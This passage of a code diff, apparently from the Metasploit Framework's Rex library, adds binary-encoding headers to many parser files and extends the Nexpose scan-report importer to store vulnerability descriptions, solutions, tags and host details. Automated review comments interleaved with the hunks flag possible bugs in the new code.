+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/substorage.rb b/lib/rex/ole/substorage.rb
index de3c3bc62b..1e14440853 100644
--- a/lib/rex/ole/substorage.rb
+++ b/lib/rex/ole/substorage.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/util.rb b/lib/rex/ole/util.rb
index 890b88cb33..5712e598c8 100644
--- a/lib/rex/ole/util.rb
+++ b/lib/rex/ole/util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/parser/acunetix_nokogiri.rb b/lib/rex/parser/acunetix_nokogiri.rb
index e102a5f4c4..2700b5d98b 100644
--- a/lib/rex/parser/acunetix_nokogiri.rb
+++ b/lib/rex/parser/acunetix_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
require 'rex'
require 'uri'
diff --git a/lib/rex/parser/apple_backup_manifestdb.rb b/lib/rex/parser/apple_backup_manifestdb.rb
index fca355968f..38b08510cc 100644
--- a/lib/rex/parser/apple_backup_manifestdb.rb
+++ b/lib/rex/parser/apple_backup_manifestdb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This is a Ruby port of the Python manifest parsing code posted to:
# http://stackoverflow.com/questions/3085153/how-to-parse-the-manifest-mbdb-file-in-an-ios-4-0-itunes-backup/3130860#3130860
diff --git a/lib/rex/parser/appscan_nokogiri.rb b/lib/rex/parser/appscan_nokogiri.rb
index ffa8e26779..27ced30d15 100644
--- a/lib/rex/parser/appscan_nokogiri.rb
+++ b/lib/rex/parser/appscan_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/arguments.rb b/lib/rex/parser/arguments.rb
index e63b14e0b8..7796ed3623 100644
--- a/lib/rex/parser/arguments.rb
+++ b/lib/rex/parser/arguments.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'shellwords'
module Rex
diff --git a/lib/rex/parser/arguments.rb.ut.rb b/lib/rex/parser/arguments.rb.ut.rb
index 81f0ce8953..49a1549a5a 100644
--- a/lib/rex/parser/arguments.rb.ut.rb
+++ b/lib/rex/parser/arguments.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb
index 02285cc4b1..829d3d4abe 100644
--- a/lib/rex/parser/burp_session_nokogiri.rb
+++ b/lib/rex/parser/burp_session_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/ci_nokogiri.rb b/lib/rex/parser/ci_nokogiri.rb
index 4cbcb361eb..a394303bbd 100644
--- a/lib/rex/parser/ci_nokogiri.rb
+++ b/lib/rex/parser/ci_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
require 'msf/core'
diff --git a/lib/rex/parser/foundstone_nokogiri.rb b/lib/rex/parser/foundstone_nokogiri.rb
index b6581e9bdc..fd880fa2da 100644
--- a/lib/rex/parser/foundstone_nokogiri.rb
+++ b/lib/rex/parser/foundstone_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb
index b0cd12ff57..dd990cc110 100644
--- a/lib/rex/parser/fusionvm_nokogiri.rb
+++ b/lib/rex/parser/fusionvm_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/ini.rb b/lib/rex/parser/ini.rb
index aa8ec45394..da7d14d354 100644
--- a/lib/rex/parser/ini.rb
+++ b/lib/rex/parser/ini.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/ini.rb.ut.rb b/lib/rex/parser/ini.rb.ut.rb
index 1890c1f34e..002384dbcf 100644
--- a/lib/rex/parser/ini.rb.ut.rb
+++ b/lib/rex/parser/ini.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/parser/ip360_aspl_xml.rb b/lib/rex/parser/ip360_aspl_xml.rb
index 988c2b2641..700045c413 100644
--- a/lib/rex/parser/ip360_aspl_xml.rb
+++ b/lib/rex/parser/ip360_aspl_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/ui'
diff --git a/lib/rex/parser/ip360_xml.rb b/lib/rex/parser/ip360_xml.rb
index 6045a23ded..ffb0b5f35f 100644
--- a/lib/rex/parser/ip360_xml.rb
+++ b/lib/rex/parser/ip360_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/ui'
diff --git a/lib/rex/parser/mbsa_nokogiri.rb b/lib/rex/parser/mbsa_nokogiri.rb
index 593fc20590..fd6ab13e77 100644
--- a/lib/rex/parser/mbsa_nokogiri.rb
+++ b/lib/rex/parser/mbsa_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/nessus_xml.rb b/lib/rex/parser/nessus_xml.rb
index 14919e6404..fd3e33a1d2 100644
--- a/lib/rex/parser/nessus_xml.rb
+++ b/lib/rex/parser/nessus_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/ui'
diff --git a/lib/rex/parser/netsparker_xml.rb b/lib/rex/parser/netsparker_xml.rb
index b1307830ac..005d413a59 100644
--- a/lib/rex/parser/netsparker_xml.rb
+++ b/lib/rex/parser/netsparker_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb
index 2f852a7258..b7892e5762 100644
--- a/lib/rex/parser/nexpose_raw_nokogiri.rb
+++ b/lib/rex/parser/nexpose_raw_nokogiri.rb
@@ -1,4 +1,6 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
+require "date"
module Rex
module Parser
@@ -10,6 +12,13 @@ module Rex
attr_reader :tests
+ NEXPOSE_HOST_DETAIL_FIELDS = %W{ nx_device_id nx_site_name nx_site_importance nx_scan_template nx_risk_score }
+ NEXPOSE_VULN_DETAIL_FIELDS = %W{
+ nx_scan_id
+ nx_vulnerable_since
+ nx_pci_compliance_status
+ }
+
# Triggered every time a new element is encountered. We keep state
# ourselves with the @state variable, turning things on when we
# get here (and turning things off when we exit in end_element()).
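Review bot: `NEXPOSE_VULN_DETAIL_FIELDS` is defined here but none of the visible hunks reference it. record_host_test and record_service_test each copy `scan-id`, `vulnerable-since` and `pci-compliance-status` by hand in three identical lines, whereas record_host loops over `NEXPOSE_HOST_DETAIL_FIELDS`. Either drive those copies from the constant in the same way or drop it. Both lists also use `%W{}` although nothing is interpolated, and neither is frozen; `%w{ ... }.freeze` would state the intent.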
@@ -19,12 +28,13 @@ module Rex
@state[:current_tag][name] = true
case name
when "nodes" # There are two main sections, nodes and VulnerabilityDefinitions
- @tests = []
+ @tests = {}
when "node"
record_host(attrs)
when "name"
@state[:has_text] = true
when "endpoint"
+ @state.delete(:cached_service_object)
record_service(attrs)
when "service"
record_service_info(attrs)
@@ -33,6 +43,7 @@ module Rex
when "os"
record_os_fingerprint(attrs)
when "test" # All the vulns tested for
+ @state[:has_text] = true
record_host_test(attrs)
record_service_test(attrs)
when "vulnerability"
@@ -40,6 +51,27 @@ module Rex
when "reference"
@state[:has_text] = true
record_reference(attrs)
+ when "description"
+ @state[:has_text] = true
+ record_vuln_description(attrs)
+ when "solution"
+ @state[:has_text] = true
+ record_vuln_solution(attrs)
+ when "tag"
+ @state[:has_text] = true
+ when "tags"
+ @state[:tags] = []
+ #
+ # These are markup tags only present within description/solutions
+ #
+ when "ContainerBlockElement", # Overall container, no formatting
+ "Paragraph", #
+ "UnorderedList", # List container (bulleted)
+ "ListItem", # List item
+ "URLLink" # KB 887429
+
+ record_formatted_content(name, attrs)
+
end
end
@@ -58,12 +90,16 @@ module Rex
when "name"
collect_hostname
@state[:has_text] = false
+ @text = nil
when "endpoint"
collect_service_data
+ @state.delete(:cached_service_object)
when "os"
collect_os_fingerprints
when "test"
- save_test
+ report_test(&block)
+ @state[:has_text] = false
+ @text = nil
when "vulnerability"
collect_vuln_info
report_vuln(&block)
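Review bot: The `when "test"` branch forwards the block with `report_test(&block)`, but `report_test` in the later hunk is declared as `def report_test` and never yields or emits, so the block is silently dropped. Ruby accepts this, which makes the mismatch easy to miss. Either call `report_test` without the block, or declare `def report_test(&block)` and emit progress there the way report_vuln does with `db.emit(:vuln, ..., &block) if block`. The enclosing method starts outside this hunk.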
@@ -72,6 +108,31 @@ module Rex
@state[:has_text] = false
collect_reference
@text = nil
+ when "description"
+ @state[:has_text] = false
+ collect_vuln_description
+ @text = nil
+ when "solution"
+ @state[:has_text] = false
+ collect_vuln_solution
+ @text = nil
+ when "tag"
+ @state[:has_text] = false
+ collect_tag
+ @text = nil
+ when "tags"
+ @report_data[:vuln_tags] = @state[:tags]
+ @state.delete(:tags)
+ #
+ # These are markup tags only present within description/solutions
+ #
+ when "ContainerBlockElement", # Overall container, no formatting
+ "Paragraph", #
+ "UnorderedList", # List container (bulleted)
+ "ListItem", # List item
+ "URLLink" # KB 887429
+
+ collect_formatted_content(name)
end
@state[:current_tag].delete name
end
@@ -86,6 +147,29 @@ module Rex
@state[:ref] = nil
end
+ def collect_vuln_description
+ return unless in_tag("description")
+ return unless in_tag("vulnerability")
+ return unless @state[:vuln]
+ @report_data[:vuln_description] = clean_formatted_text( @report_data[:vuln_description_stack].join.strip )
+ end
+
+ def collect_vuln_solution
+ return unless in_tag("solution")
+ return unless in_tag("vulnerability")
+ return unless @state[:vuln]
+ @report_data[:vuln_solution] = clean_formatted_text( @report_data[:vuln_solution_stack].join.strip )
+ end
+
+ def collect_tag
+ return unless in_tag("tag")
+ return unless in_tag("tags")
+ return unless in_tag("vulnerability")
+ return unless @state[:vuln]
+ @state[:tags] ||= []
+ @state[:tags] << @text.to_s.strip
+ end
+
def collect_vuln_info
return unless in_tag("VulnerabilityDefinitions")
return unless in_tag("vulnerability")
@@ -101,49 +185,57 @@ module Rex
return unless in_tag("VulnerabilityDefinitions")
return unless @report_data[:vuln]
return unless @report_data[:vuln][:matches].kind_of? Array
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
refs = normalize_references(@report_data[:vuln][:refs])
refs << "NEXPOSE-#{report_data[:vuln]["id"]}"
vuln_instances = @report_data[:vuln][:matches].size
db.emit(:vuln, [refs.last,vuln_instances], &block) if block
- data = {
- :workspace => @args[:wspace],
- :name => refs.last,
- :info => @report_data[:vuln]["title"],
- :refs => refs.uniq
- }
- hosts_keys = {}
- @report_data[:vuln][:matches].each do |match|
- host_data = data.dup
- host_data[:host] = match[:host]
- host_data[:port] = match[:port] if match[:port]
- host_data[:proto] = match[:protocol] if match[:protocol]
- db_report(:vuln, host_data)
- if match[:key]
- hosts_keys[host_data[:host]] ||= []
- hosts_keys[host_data[:host]] << match[:key]
- end
- end
- report_key_note(hosts_keys,data)
- @report_data[:vuln] = nil
- end
- def report_key_note(hosts_keys,data)
- return if hosts_keys.empty?
- hosts_keys.each do |key_host,key_values|
- key_note = {
- :workspace => @args[:wspace],
- :host => key_host,
- :type => "host.vuln.nexpose_keys",
- :data => {},
- :update => :unique_data
- }
- key_values.each do |key_value|
- key_note[:data][data[:name]] ||= []
- next if key_note[:data][data[:name]].include? key_value
- key_note[:data][data[:name]] << key_value
+ vuln_ids = @report_data[:vuln][:matches].map{ |v| v[0] }
+ vdet_ids = @report_data[:vuln][:matches].map{ |v| v[1] }
+
+ refs = refs.uniq.map{|x| db.find_or_create_ref(:name => x) }
+
+ # Assign title and references to all vuln_ids
+ # Mass update fails due to the join table || ::Mdm::Vuln.where(:id => vuln_ids).update_all({ :name => @report_data[:vuln]["title"], :refs => refs } )
+ vuln_ids.each do |vid|
+ vuln = ::Mdm::Vuln.find(vid)
+ next unless vuln
+ vuln.name = @report_data[:vuln]["title"]
+
+ if refs.length > 0
+ vuln.refs += refs
+ end
+
+ if vuln.changed?
+ vuln.save!
end
- db_report(:note, key_note)
end
+
+ # Mass update vulnerability details across the database based on conditions
+ vdet_info = { :title => @report_data[:vuln]["title"] }
+ vdet_info[:description] = @report_data[:vuln_description] unless @report_data[:vuln_description].to_s.empty?
+ vdet_info[:solution] = @report_data[:vuln_solution] unless @report_data[:vuln_solution].to_s.empty?
+ vdet_info[:nx_tags] = @report_data[:vuln_tags].sort.uniq.join(", ") if ( @report_data[:vuln_tags].kind_of?(::Array) and @report_data[:vuln_tags].length > 0 )
+ vdet_info[:nx_severity] = @report_data[:vuln]["severity"].to_f if @report_data[:vuln]["severity"]
+ vdet_info[:nx_pci_severity] = @report_data[:vuln]["pciSeverity"].to_f if @report_data[:vuln]["pciSeverity"]
+ vdet_info[:cvss_score] = @report_data[:vuln]["cvssScore"].to_f if @report_data[:vuln]["cvssScore"]
+ vdet_info[:cvss_vector] = @report_data[:vuln]["cvssVector"] if @report_data[:vuln]["cvssVector"]
+
+ %W{ published added modified }.each do |tf|
+ next if not @report_data[:vuln][tf]
+ ts = DateTime.parse(@report_data[:vuln][tf]) rescue nil
+ next if not ts
+ vdet_info[ "nx_#{tf}".to_sym ] = ts
+ end
+
+ ::Mdm::VulnDetail.where(:id => vdet_ids).update_all(vdet_info)
+
+ @report_data[:vuln] = nil
+
+ }
end
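Review bot: In the `vuln_ids.each` loop, `::Mdm::Vuln.find(vid)` raises ActiveRecord::RecordNotFound for a missing row instead of returning nil, so the `next unless vuln` guard below it can never fire and the exception leaves the parser callback. `vuln = ::Mdm::Vuln.where(:id => vid).first` keeps the intended skip. Separately, `@report_data[:vuln_description]`, `:vuln_solution` and `:vuln_tags` are read here but only `@report_data[:vuln]` is reset at the end. Unless they are cleared elsewhere, a definition that lacks those elements would be stored with the previous definition's text; resetting them next to `@report_data[:vuln] = nil` avoids that. report_vuln's `def` line is outside the hunk.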
def record_reference(attrs)
@@ -155,22 +247,202 @@ module Rex
def record_vuln(attrs)
return unless in_tag("VulnerabilityDefinitions")
vuln = attr_hash(attrs)
- matching_tests = @tests.select {|x| x[:id] == vuln["id"].downcase}
+ matching_tests = @tests[ vuln["id"].downcase ]
+ return unless matching_tests
return if matching_tests.empty?
@state[:vuln] = vuln
@state[:vuln][:matches] = matching_tests
end
- def save_test
+ def record_vuln_description(attrs)
+ @report_data[:vuln_description_stack] = []
+ end
+
+ def record_vuln_solution(attrs)
+ @report_data[:vuln_solution_stack] = []
+ end
+
+
+ def record_formatted_content(name, eattrs)
+ attrs = attr_hash(eattrs)
+ stack = nil
+
+ if in_tag("solution")
+ stack = @report_data[:vuln_solution_stack]
+ end
+
+ if in_tag("description")
+ stack = @report_data[:vuln_description_stack]
+ end
+
+ if in_tag("test")
+ stack = @report_data[:vuln_proof_stack]
+ end
+
+ return if not stack
+
+ @report_data[:formatted_indent] ||= 0
+
+ data = @text.to_s.strip.split(/\n+/).map{|t| t.strip}.join(" ")
+ @text = ""
+
+ case name
+ when 'ListItem'
+ @report_data[:formatted_indent] = 1
+ # data = "\n* " + data
+ when 'URLLink'
+ @report_data[:formatted_link] = attrs["LinkURL"]
+ else
+
+ if @report_data[:formatted_indent] > 1
+ data = (" " * (@report_data[:formatted_indent])) + data
+ end
+
+ if @report_data[:formatted_indent] == 1
+ @report_data[:formatted_indent] = 6
+ end
+ end
+
+ if data.length > 0
+ stack << data
+ end
+ end
+
+ def collect_formatted_content(name)
+ stack = nil
+ prefix = ""
+
+ if in_tag("solution")
+ stack = @report_data[:vuln_solution_stack]
+ end
+
+ if in_tag("description")
+ stack = @report_data[:vuln_description_stack]
+ end
+
+ if in_tag("test")
+ stack = @report_data[:vuln_proof_stack]
+ end
+
+ return if not stack
+
+ data = @text.to_s.strip.split(/\n+/).map{|t| t.strip}.join(" ")
+ @text = ""
+
+ case name
+ when 'URLLink'
+ if @report_data[:formatted_link]
+ if data != @report_data[:formatted_link]
+ if data.empty?
+ data << (" " + @report_data[:formatted_link])
+ else
+ data = " " + data + " ( " + @report_data[:formatted_link] + " )"
+ end
+ end
+ end
+ when 'Paragraph'
+ data << "\n\n"
+ when 'ListItem'
+ @report_data[:formatted_indent] = 0
+ data << "\n"
+ end
+
+ if data.length > 0
+ stack << data
+ end
+ end
+
+ # XML Export 2.0 includes additional test keys:
+ #
+
+ def report_test
return unless in_tag("nodes")
return unless in_tag("node")
return unless @state[:test]
- test = { :id => @state[:test][:id]}
- test[:host] = @state[:address]
- test[:port] = @state[:test][:port] if @state[:test][:port]
- test[:protocol] = @state[:test][:protocol] if @state[:test][:protocol]
- test[:key] = @state[:test][:key] if @state[:test][:key]
- @tests << test
+
+ vuln_info = {
+ :workspace => @args[:wspace],
+ # This name will be overwritten during the vuln definition
+ # parsing via mass-update.
+ :name => "NEXPOSE-" + @state[:test][:id].downcase,
+ :host => @state[:cached_host_object] || @state[:address]
+ }
+
+ if in_tag("endpoint") and @state[:test][:port]
+ # Verify this port actually has some relation to our tracked state
+ # since it may not due to greedy vulnerability matching
+ if @state[:cached_service_object] and @state[:cached_service_object].port.to_i == @state[:test][:port].to_i
+ vuln_info[:service] = @state[:cached_service_object]
+ else
+ vuln_info[:port] = @state[:test][:port]
+ vuln_info[:proto] = @state[:test][:protocol] if @state[:test][:protocol]
+ end
+ end
+
+ # This hash feeds a vuln_details row for this vulnerability
+ vdet = { :src => 'nexpose', :nx_vuln_id => @state[:test][:id] }
+
+ # This hash defines the matching criteria to overwrite an existing entry
+ vkey = { :src => 'nexpose', :nx_vuln_id => @state[:test][:id] }
+
+ if @state[:nx_device_id]
+ vdet[:nx_device_id] = @state[:nx_device_id]
+ vkey[:nx_device_id] = @state[:nx_device_id]
+ end
+
+ if @state[:test][:key]
+ vdet[:nx_proof_key] = @state[:test][:key]
+ vkey[:nx_proof_key] = @state[:test][:key]
+ end
+
+ vdet[:nx_console_id] = @nx_console_id if @nx_console_id
+ vdet[:nx_vuln_status] = @state[:test][:status] if @state[:test][:status]
+
+ vdet[:nx_scan_id] = @state[:test][:nx_scan_id] if @state[:test][:nx_scan_id]
+ vdet[:nx_pci_compliance_status] = @state[:test][:nx_pci_compliance_status] if @state[:test][:nx_pci_compliance_status]
+
+ if @state[:test][:nx_vulnerable_since]
+ ts = ::DateTime.parse(@state[:test][:nx_vulnerable_since]) rescue nil
+ vdet[:nx_vulnerable_since] = ts if ts
+ end
+
+ proof = clean_formatted_text(@report_data[:vuln_proof_stack].join.strip)
+ @report_data[:vuln_proof_stack] = []
+
+ vuln_info[:info] = proof
+ vdet[:proof] = proof
+
+ # Configure the find key for vuln_details
+ vdet[:key] = vkey
+
+ # Pass this key to the vuln hash to find existing entries
+ # that may have been renamed (re-import nexpose vulns)
+ vuln_info[:details_match] = vkey
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ # Report the vulnerability
+ vuln = db.report_vuln(vuln_info)
+
+ if vuln
+ # Report the vulnerability details
+ detail = db.report_vuln_details(vuln, vdet)
+
+ # Cache returned host and service objects if necessary
+ @state[:cached_host_object] ||= vuln.host
+
+ # The vuln.service may be found via greedy matching
+ if in_tag("endpoint") and vuln.service
+ @state[:cached_service_object] ||= vuln.service
+ end
+
+ # Record the ID of this vuln for a future mass update that
+ # brings in title, risk, description, solution, etc
+ @tests[ @state[:test][:id].downcase ] ||= []
+ @tests[ @state[:test][:id].downcase ] << [ vuln.id, detail.id ]
+ end
+
+ }
@state[:test] = nil
end
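Review bot: At the end of report_test, `detail.id` is dereferenced without a check, although the `vuln` returned by db.report_vuln just above is guarded with `if vuln`. If db.report_vuln_details can return nil (its contract is not visible here), the import stops with a NoMethodError inside the connection block and `@state[:test]` is never cleared. Guarding the append, `(@tests[ @state[:test][:id].downcase ] ||= []) << [ vuln.id, detail.id ] if detail`, keeps the two results handled symmetrically. The comment `# XML Export 2.0 includes additional test keys:` above the method ends without listing any; presumably it means the `scan-id`, `vulnerable-since` and `pci-compliance-status` attributes read in record_host_test, and naming them would complete it.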
@@ -275,7 +547,7 @@ module Rex
if state[:service]["name"] == ""
sname = nil
else
- sname = db.nmap_msf_service_map(@state[:service]["name"])
+ sname = db.service_name_map(@state[:service]["name"])
end
port_hash[:name] = sname
end
@@ -302,10 +574,16 @@ module Rex
return unless in_tag("node")
return if in_tag("service")
return unless in_tag("tests")
+
test = attr_hash(attrs)
return unless actually_vulnerable(test)
@state[:test] = {:id => test["id"].downcase}
@state[:test][:key] = test["key"] if test["key"]
+ @state[:test][:nx_scan_id] = test["scan-id"] if test["scan-id"]
+ @state[:test][:nx_vulnerable_since] = test["vulnerable-since"] if test["vulnerable-since"]
+ @state[:test][:nx_pci_compliance_status] = test["pci-compliance-status"] if test["pci-compliance-status"]
+
+ @report_data[:vuln_proof_stack] = []
end
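Review bot: record_host_test copies `key`, `scan-id`, `vulnerable-since` and `pci-compliance-status` into `@state[:test]` but not `status`, whereas record_service_test in the next hunk adds `@state[:test][:status] = test["status"] if test["status"]`. report_test reads `@state[:test][:status]` into `vdet[:nx_vuln_status]`, so host-level findings are stored without a status while service-level ones carry it. If that difference is not intended, add the same line here. record_host_test begins outside the hunk.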
def record_service_test(attrs)
@@ -321,6 +599,11 @@ module Rex
:protocol => @state[:service]["protocol"],
}
@state[:test][:key] = test["key"] if test["key"]
+ @state[:test][:status] = test["status"] if test["status"]
+ @state[:test][:nx_scan_id] = test["scan-id"] if test["scan-id"]
+ @state[:test][:nx_vulnerable_since] = test["vulnerable-since"] if test["vulnerable-since"]
+ @state[:test][:nx_pci_compliance_status] = test["pci-compliance-status"] if test["pci-compliance-status"]
+ @report_data[:vuln_proof_stack] = []
end
def record_host(attrs)
@@ -330,6 +613,14 @@ module Rex
@state[:host_is_alive] = true
@state[:address] = host_attrs["address"]
@state[:mac] = host_attrs["hardware-address"] if host_attrs["hardware-address"]
+
+ NEXPOSE_HOST_DETAIL_FIELDS.each do |f|
+ fs = f.to_sym
+ fk = f.sub(/^nx_/, '').gsub('_', '-')
+ if host_attrs[fk]
+ @state[fs] = host_attrs[fk]
+ end
+ end
end
end
@@ -345,20 +636,49 @@ module Rex
@report_data[:mac] = @state[:mac]
end
end
+
+ NEXPOSE_HOST_DETAIL_FIELDS.each do |f|
+ v = @state[f.to_sym]
+ @report_data[f.to_sym] = v if v
+ end
end
def report_host(&block)
if host_is_okay
db.emit(:address,@report_data[:host],&block) if block
- host_object = db_report(:host, @report_data.merge(
- :workspace => @args[:wspace] ) )
+ device_id = @report_data[:nx_device_id]
+
+ host_object = db_report(:host, @report_data.merge(:workspace => @args[:wspace] ) )
if host_object
db.report_import_note(host_object.workspace, host_object)
+ if device_id
+ detail = {
+ :key => { :src => 'nexpose' },
+ :src => 'nexpose',
+ :nx_device_id => device_id
+ }
+ detail[:nx_console_id] = @nx_console_id if @nx_console_id
+
+ NEXPOSE_HOST_DETAIL_FIELDS.each do |f|
+ v = @report_data.delete(f.to_sym)
+ detail[f.to_sym] = v if v
+ end
+
+
+ db.report_host_details(host_object, detail)
+ end
end
host_object
end
end
+ def clean_formatted_text(txt)
+ txt.split(/\n/).map{ |t|
+ t.sub(/^\s+$/, '').
+ sub(/^(\s{6,20})/, ' ')
+ }.join("\n").gsub(/\n{4,10}/, "\n\n\n")
+ end
+
end
end
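Review bot: `clean_formatted_text` uses bounded quantifiers that stop collapsing on long runs: `/\n{4,10}/` turns eleven newlines into four (the first ten become three and one is left over), and `/^(\s{6,20})/` leaves the remainder of any indent longer than twenty characters; `\n{4,}` and `\s{6,}` would normalise every case. It also calls `txt.split` with no nil guard, so a missing text value would raise `NoMethodError` unless callers outside this hunk check first. In `report_host`, the `nx_*` keys are deleted from `@report_data` only after `db_report(:host, ...)` has already received them, and only when both `host_object` and `device_id` are set. They therefore presumably reach the host attribute check and, unless `@report_data` is reset elsewhere, may linger for the next host. Moving them into a local hash before the `db_report` call would avoid both.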
diff --git a/lib/rex/parser/nexpose_simple_nokogiri.rb b/lib/rex/parser/nexpose_simple_nokogiri.rb
index 54751ffbdd..126194b278 100644
--- a/lib/rex/parser/nexpose_simple_nokogiri.rb
+++ b/lib/rex/parser/nexpose_simple_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/nexpose_xml.rb b/lib/rex/parser/nexpose_xml.rb
index 2903eaeedb..1d3dd85f57 100644
--- a/lib/rex/parser/nexpose_xml.rb
+++ b/lib/rex/parser/nexpose_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/nmap_nokogiri.rb b/lib/rex/parser/nmap_nokogiri.rb
index a0ba49a744..19dca7c728 100644
--- a/lib/rex/parser/nmap_nokogiri.rb
+++ b/lib/rex/parser/nmap_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/nmap_xml.rb b/lib/rex/parser/nmap_xml.rb
index e26545d36c..f8a19fa6f0 100644
--- a/lib/rex/parser/nmap_xml.rb
+++ b/lib/rex/parser/nmap_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb
index 65e1312c90..10a1557c95 100644
--- a/lib/rex/parser/nokogiri_doc_mixin.rb
+++ b/lib/rex/parser/nokogiri_doc_mixin.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
@@ -49,6 +50,7 @@ module Parser
@state[:current_tag] = {}
@block = block if block
@report_data = {:wspace => args[:wspace]}
+ @nx_console_id = args[:nx_console_id]
super()
end
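Review bot: This adds a Nexpose-specific instance variable to the initializer of a mixin that the nmap, OpenVAS and wapiti parsers in this commit also require, which is a style concern rather than a bug. The Nexpose parser already reads `@args[:wspace]`, so if `@args` is populated by this initializer (its start is outside the hunk), `report_host` could read `@args[:nx_console_id]` directly and this line could be dropped. If the variable stays, a comment such as `# Nexpose console id; only set by Nexpose imports, nil for every other parser` would make the coupling explicit.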
@@ -149,7 +151,11 @@ module Parser
[:host, :host_name, :mac, :workspace]
when :vuln
::Mdm::Vuln.new.attribute_names.map {|x| x.to_sym} |
- [:host, :refs, :workspace, :port, :proto]
+ [:host, :refs, :workspace, :port, :proto, :details, :exploited_at]
+ when :vuln_details
+ ::Mdm::VulnDetails.new.attribute_names.map {|x| x.to_sym} | [ :key ]
+ when :host_details
+ ::Mdm::HostDetails.new.attribute_names.map {|x| x.to_sym} | [ :key ]
when :note, :web_site, :web_page, :web_form, :web_vuln
# These guys don't complain
[:anything]
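Review bot: The new `:vuln_details` and `:host_details` branches extend the attribute allow-list, but the only host-detail write visible in this commit calls `db.report_host_details(host_object, detail)` directly rather than going through `db_report`. That hash is built from imported scanner attributes and so appears to skip this check. Either apply the same check on that path or add a comment here saying which callers are expected to use these branches. Each branch also instantiates a model just to list its attribute names, as the existing `:vuln` branch does, which could be memoised. The `case` statement starts outside this hunk.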
diff --git a/lib/rex/parser/openvas_nokogiri.rb b/lib/rex/parser/openvas_nokogiri.rb
index d55826f613..fd043023ba 100644
--- a/lib/rex/parser/openvas_nokogiri.rb
+++ b/lib/rex/parser/openvas_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/retina_xml.rb b/lib/rex/parser/retina_xml.rb
index 485ca15080..4c34cde91e 100644
--- a/lib/rex/parser/retina_xml.rb
+++ b/lib/rex/parser/retina_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/wapiti_nokogiri.rb b/lib/rex/parser/wapiti_nokogiri.rb
index 4acb93a0cc..d9aad2d461 100644
--- a/lib/rex/parser/wapiti_nokogiri.rb
+++ b/lib/rex/parser/wapiti_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/payloads.rb b/lib/rex/payloads.rb
index 1b9315643a..eedb44076b 100644
--- a/lib/rex/payloads.rb
+++ b/lib/rex/payloads.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/payloads/win32'
diff --git a/lib/rex/payloads/win32.rb b/lib/rex/payloads/win32.rb
index 563607516f..e7bf68e4f2 100644
--- a/lib/rex/payloads/win32.rb
+++ b/lib/rex/payloads/win32.rb
@@ -1,2 +1,3 @@
+# -*- coding: binary -*-
require 'rex/payloads/win32/common'
require 'rex/payloads/win32/kernel'
diff --git a/lib/rex/payloads/win32/common.rb b/lib/rex/payloads/win32/common.rb
index a46926bf5c..bfd8b663d2 100644
--- a/lib/rex/payloads/win32/common.rb
+++ b/lib/rex/payloads/win32/common.rb
